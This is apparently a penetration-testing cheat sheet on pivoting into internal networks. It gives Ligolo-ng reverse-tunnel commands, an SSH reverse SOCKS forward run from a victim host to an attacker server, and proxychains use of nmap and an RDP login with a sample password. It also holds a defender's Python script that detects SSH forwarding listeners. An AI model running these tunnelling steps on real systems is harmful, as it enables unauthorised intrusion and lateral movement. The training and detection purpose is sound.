# Pivoting (Proxying)

## Method 1: Ligolo-ng

**Ligolo** is a *simple* and *lightweight* tool for establishing *SOCKS5* or *TCP* tunnels over a reverse connection, secured with TLS (elliptic-curve certificate).

* <https://github.com/sysdream/ligolo>

**1) To run the proxy on your victim host:**

`./ligolo.exe -connect <IP>:<PORT> -ignore-cert`

**2) To run the server on your attack host:**

* Start the server
  * `sudo ./proxy -selfcert -laddr 0.0.0.0:<port>`
* Once the agent has connected, list the sessions, select one and view the agent host's network interfaces
  * `session`
  * `ifconfig`
* Add a route to the internal network through the ligolo TUN interface
  * `sudo ip route add <Your_local_IPrange>/24 dev ligolo`
* Start the tunnel in ligolo
  * `tunnel_start`

## Method 2: SSH Reverse Proxy

SSH can natively perform pivoting. In the example below, we have three machines:

1. The SSH server
2. The attack host
3. The victim host (in an internal network)

* On your SSH server, set up an SSH key:
  * `ssh-keygen -C attacker@attacker`
* Add the generated public key to your SSH server's authorized keys list
  * `/home/<user>/.ssh/authorized_keys`
* On your victim host, upload the generated private key and run the following command:
  * `ssh -i <SSHKey> -R 1037 -N <user>@<SSH_IP_Address>`
  * With only a port given to `-R` (reverse dynamic forwarding), the SSH server exposes a SOCKS proxy on that port, bound to localhost by default, whose connections exit from the victim host
* On your attack host, make the reverse connection to the SSH server
  * `ssh -i <sshkey> -L 8008:localhost:1037 -vN <user>@<SSH_IP_Address>`
  * Now you have a connection from your attack host to the victim host and its network
* Now proxy any tool through the SOCKS proxy you created at 127.0.0.1:8008
  * Or use proxychains
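A defender-side check for the reverse forward above, added here as an example and not part of the original notes: with sshd's default `GatewayPorts no`, the `-R 1037` forward makes `sshd` listen on 127.0.0.1:1037 on the SSH server, so loopback listeners owned by `ssh`/`sshd` on anything other than the SSH service port are a direct sign of port forwarding (the same logic flags the client-side `-L 8008` listener). It parses `ss -tlnp` output; the sample output below is constructed, and the service-port set is an assumption to adjust for non-default sshd ports.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample of `ss -tlnp` output as it would look on the SSH server
# from the notes above: the normal sshd service on :22 plus the loopback
# listener that the victim's `-R 1037` forward creates.
SAMPLE_SS_OUTPUT = """\
State   Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22          0.0.0.0:*          users:(("sshd",pid=812,fd=3))
LISTEN  0       128     127.0.0.1:1037      0.0.0.0:*          users:(("sshd",pid=4410,fd=9))
LISTEN  0       4096    127.0.0.1:631       0.0.0.0:*          users:(("cupsd",pid=700,fd=7))
LISTEN  0       128     [::]:22             [::]:*             users:(("sshd",pid=812,fd=4))
"""

SSH_SERVICE_PORTS = {22}          # assumption: adjust if sshd listens elsewhere
SSH_PROCESSES = {"ssh", "sshd"}   # sshd holds -R forwards, ssh holds -L/-D ones

_PROC_RE = re.compile(r'\("(?P<name>[^"]+)",pid=(?P<pid>\d+)')


@dataclass(frozen=True)
class Listener:
    address: str
    port: int
    process: str
    pid: int


def parse_ss_listeners(ss_output: str) -> list[Listener]:
    """Extract every LISTEN socket and its owning process from `ss -tlnp` text."""
    listeners = []
    for line in ss_output.splitlines():
        parts = line.split()
        if len(parts) < 6 or parts[0] != "LISTEN":
            continue  # header line or malformed row
        address, _, port = parts[3].rpartition(":")
        match = _PROC_RE.search(parts[5])
        if match is None or not port.isdigit():
            continue
        listeners.append(Listener(address, int(port), match["name"], int(match["pid"])))
    return listeners


def find_ssh_forward_listeners(ss_output: str) -> list[Listener]:
    """Listeners held by ssh/sshd that are not the SSH service itself: these are
    port forwards (-R on a server, -L/-D on a client) and deserve a look."""
    return [l for l in parse_ss_listeners(ss_output)
            if l.process in SSH_PROCESSES and l.port not in SSH_SERVICE_PORTS]


if __name__ == "__main__":
    for hit in find_ssh_forward_listeners(SAMPLE_SS_OUTPUT):
        print(f"SSH forward listener {hit.address}:{hit.port} ({hit.process}, pid {hit.pid})")
```

Feed it live output with `subprocess.check_output(["ss", "-tlnp"], text=True)`; where forwarding is not needed at all, `AllowTcpForwarding no` in sshd_config stops the `-R` listener from ever being created.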

## Sending tools through a pivot (using Proxychains)

proxychains forces every TCP connection made by a given application to go through a proxy.

* <https://github.com/haad/proxychains>

**1) Setup Proxychains with an established SOCKS Pivot**

* Edit `/etc/proxychains.conf` (e.g. with nano)
* Add `socks4 127.0.0.1 9050` (the port must match the local end of your SOCKS pivot)

**2) Run tools through proxychains so their TCP connections go to local port 9050 and are forwarded over SSH to the victim network.**

* `proxychains nmap -v -Pn -sT 172.16.5.19`
  * Only full TCP connect scans (`-sT`) work: a SOCKS proxy relays complete TCP connections, so raw-packet SYN scans cannot be tunnelled, and `-Pn` skips host discovery, which would not traverse the proxy either
* `proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123`
* `proxychains <yourtool>`
